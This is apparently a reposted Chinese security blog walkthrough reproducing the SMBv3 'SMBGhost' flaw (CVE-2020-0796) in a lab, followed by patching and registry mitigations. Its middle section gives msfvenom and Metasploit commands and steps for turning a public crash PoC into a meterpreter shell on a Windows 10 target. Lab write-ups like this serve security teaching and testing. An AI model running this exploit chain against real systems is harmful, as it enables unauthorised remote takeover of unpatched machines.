博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
msf win10漏洞_永恒之黑:CVE20200796漏洞复现
阅读量:4579 次
发布时间:2019-06-08

本文共 1847 字,大约阅读时间需要 6 分钟。

5ecd6fcb574f8bc8acacfe99a68ca4d6.png

2017年,“永恒之蓝”,

3年之后,

“永恒之黑” 来了。

漏洞介绍

3月12日, 微软披露了一个最新的SMBv3(3.1.1)远程代码执行漏洞(CVE-2020-0796),俗称“永恒之黑”。

本漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。利用该漏洞,攻击方可直接远程攻击SMB服务端远程执行任意恶意代码,亦可通过构建恶意SMB服务端诱导客户端连接从而大规模攻击客户端。永恒之黑一旦被成功利用,其危害不亚于永恒之蓝。

同时,CVE-2020-0796漏洞与“永恒之蓝”系列漏洞极为相似,都是利用Windows SMB漏洞远程攻击获取系统最高权限。
漏洞危害等级:高危 “永恒之黑”漏洞高危之处在于对SMB客户端的攻击,攻击者可以通过构造一个“特制”的网页、压缩包、共享目录、OFFICE文档等,向攻击目标发送,一旦被攻击者打开则瞬间触发漏洞受到攻击。
漏洞影响范围 Windows 10 Version 1903 for 32-bit SystemsWindows 10 Version 1903 for x64-based SystemsWindows 10 Version 1903 for ARM64-based SystemsWindows Server, Version 1903 (Server Core installation)Windows 10 Version 1909 for 32-bit SystemsWindows 10 Version 1909 for x64-based SystemsWindows 10 Version 1909 for ARM64-based SystemsWindows Server, Version 1909 (Server Core installation)

漏洞复现

想要复现这个永恒之黑,大家可以搭建靶机来完成,如下所示:

1、环境准备

Win10 靶机:192.168.183.133

Kali 攻击机192.168.183.136

一定要记住:关闭防火墙,关闭防火墙,关闭防火墙!!!

2、查看环境情况

Windows版本,按win+r,在弹出窗口中,输入 winver

73a6382d421bd968f3b4350566e9d155.png

3、使用SMBGhost工具检测靶机是否存在漏洞

SMBGhost下载地址:https://github.com/ollypwn/SMBGhost

d6e4c7d2b2d154b85e5100f27343c637.png

4、使用蓝屏payload,验证漏洞

蓝屏POC地址:https://github.com/chompie1337/SMBGhost_RCE_PoC

演示:蓝屏

a34766219bdea8cb6016132cad9478cb.png

ae17df2686d68ecce548e8021b1b80cd.png以上的步骤成功证明漏洞存在。

5、利用msf生成exp反弹shell

msfvenom -p windows/x64/meterpreter/bind_tcpLPORT=4444 -b '\x00' -i 1 -f python>exploit

打开蓝屏POC 的exploit.py 文件将生成的 USER_PAYLOAD 替换为生成的exp

(注意:buf 要替换为 USER_PAYLOAD)

61de7b9647b368c8be71ce82ee93b754.png

蓝屏POC exploit 实况图

7ea5a35b0b0155d125a09aa60a8f22b8.png

Msf生成exp实况图

96929a2d199bc32f5f01baff98e5ab81.png

修改exploit.py 文件 实况图

6、设置msf监听

use payload windows/x64/meterpreter/bind_tcpset lport  监听端口Set rhost  目标ip

2066fe869813bbe1b335eaf91b4ac2e8.png

run/exploit 执行监听

7、运行修改之后的exp

python3 exploit.py  -ip  目标ip

711792b13b0bc433a81dc4269b06fe1d.png

成功反弹meterpreter,执行shell命令查看IP地址为win10机器地址

a3b32f6402304d45e2fcfce64d1634a3.png

漏洞修复

1、更新系统、完成补丁的安装:
操作步骤:设置->更新和安全->Windows更新,点击“检查更新”。
2、不更新系统的临时应对方法:
运行regedit.exe,打开注册表编辑器,在HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters建立一个名为DisableCompression的DWORD,值为1,禁止SMB的压缩功能。
3、封禁SMB通信445端口。 永恒之蓝复现: MS17-010漏洞回顾 END

信安客旨在培养网络安全人才,分享安全行业最新动态、技术交流、等保相关标准等。

e2153a59a90252d1b4f1ee4d7407f303.png

转载地址:http://hoqms.baihongyu.com/

你可能感兴趣的文章
获取汉语字符串拼音头字母
查看>>
面试1
查看>>
jQury基础1
查看>>
android 从服务器获取新闻数据并显示在客户端
查看>>
hrbust 1491 网络流一般增广路
查看>>
软件-开发工具:Gradle
查看>>
2019.7.4 打卡第五天
查看>>
opencv学习之路(11)、图像几何变换
查看>>
day06数据类型----元组、字典、集合
查看>>
while循环(break、continue)
查看>>
luogu P4137 Rmq Problem / mex 主席树 + 思维
查看>>
C++编程思想,几个宏的用法:
查看>>
j-3. foreach ,for of ,for in-------待续
查看>>
数据仓库系列4-范式2
查看>>
Docker: docker container常用命令实战(2)-数据持久化
查看>>
C#编写自动关机程序复习的知识
查看>>
bzoj 1131 [POI2008]Sta 树形dp 转移根模板题
查看>>
Yahoo!网站性能最佳体验的34条黄金守则——服务器
查看>>
国内4G频段划分
查看>>
20120104登陆与改密码
查看>>